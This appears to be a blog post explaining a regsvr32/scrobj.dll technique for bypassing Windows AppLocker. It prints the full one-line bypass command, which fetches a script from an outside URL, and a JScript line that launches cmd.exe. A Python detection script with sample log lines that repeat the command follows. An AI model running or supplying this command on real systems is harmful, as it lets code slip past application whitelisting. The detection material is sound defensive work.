Bypass Windows AppLocker

If you use Microsoft AppLocker to lock Windows computers in your office or school, then we have bad news for you.

A security researcher has discovered a way to bypass the Windows software whitelist and run arbitrary applications.

AppLocker allows IT administrators to manage large networks. They can determine which programs and which scripts can be run by users.

The service first came with the , and its goal was to stop the launch of non-work-related programs, or , or to stop end users from running programs used by the department of the company or organization.

Security researcher Casey Smith discovered a way to bypass AppLocker. The bypass method is very simple: it is the single command shown below.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

If you run the above command in Windows, you tell the operating system to download an XML file from the Internet, which instructs it to run cmd.exe.

The magic here is that if you replace cmd.exe with any program that is blocked by AppLocker, that program will start.

"It is not well-documented that Regsvr32.exe cannot accept a URL for a script," Smith said.
In the above case, the built-in uses ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

It is a case of chaining together various components in the maze of code that makes up Microsoft Windows. According to Smith, JavaScript, Visual Basic and PowerShell scripts can all be run from the web, or from a local file, via regsvr32.

So even if you are logged in to the PC as a standard user or guest, you can use the hack to bypass AppLocker.
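For administrators, the command above leaves a recognizable trace in process-creation logs: regsvr32 started with an /i: argument that is a URL, usually together with scrobj.dll. The following detection sketch is an added example, not code from Smith or from this article; the log line format, host names, user names, the example.test URL and the .sct file names are constructed for illustration.

```python
import re

# Image name: bare, quoted, or with a full path (System32 or SysWOW64).
IMAGE = re.compile(r'(?:^|[\\/"\s])regsvr32(?:\.exe)?(?=["\s]|$)', re.I)
# regsvr32 accepts "/" or "-" switches; /i: carries the string handed to the DLL.
I_ARG = re.compile(r'(?:^|[\s"])[/-]i:\s*"?([^\s"]+)', re.I)
SCROBJ = re.compile(r'(?:^|[\\/"\s])scrobj(?:\.dll)?(?=["\s]|$)', re.I)
URL = re.compile(r'^https?://', re.I)


def classify(cmdline):
    """Return (severity, reason) for a process command line, or None."""
    if not IMAGE.search(cmdline):
        return None
    arg = I_ARG.search(cmdline)
    target = arg.group(1) if arg else None
    uses_scrobj = bool(SCROBJ.search(cmdline))
    if target and URL.match(target):
        return ("high", "regsvr32 /i: fetches script from " + target)
    if target and uses_scrobj:
        return ("medium", "regsvr32 runs local script file " + target)
    return None


def scan(events):
    """events: 'time|host|user|command line' strings -> list of hits."""
    hits = []
    for line in events:
        time, host, user, cmdline = line.split("|", 3)
        verdict = classify(cmdline)
        if verdict:
            hits.append((time, host, user) + verdict)
    return hits


# Constructed sample events (hosts, users and the example.test URL are made up).
SAMPLE = [
    r'09:01:12|WS-014|alice|regsvr32 /s C:\Apps\Vendor\plugin.dll',
    r'09:03:40|WS-014|alice|regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll',
    r'09:05:02|WS-022|guest|"C:\Windows\SysWOW64\REGSVR32.EXE" -s -n -u -I:"https://example.test/a.sct" scrobj',
    r'09:07:19|WS-022|guest|regsvr32.exe /s /u /i:C:\Users\Public\t.sct scrobj.dll',
    r'09:09:55|WS-031|bob|notepad.exe scrobj.dll-notes.txt',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="  ")
```

Ordinary DLL registration (the first sample line) passes untouched, so the rule can run against every regsvr32 launch without flooding the queue.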


Written by giorgos
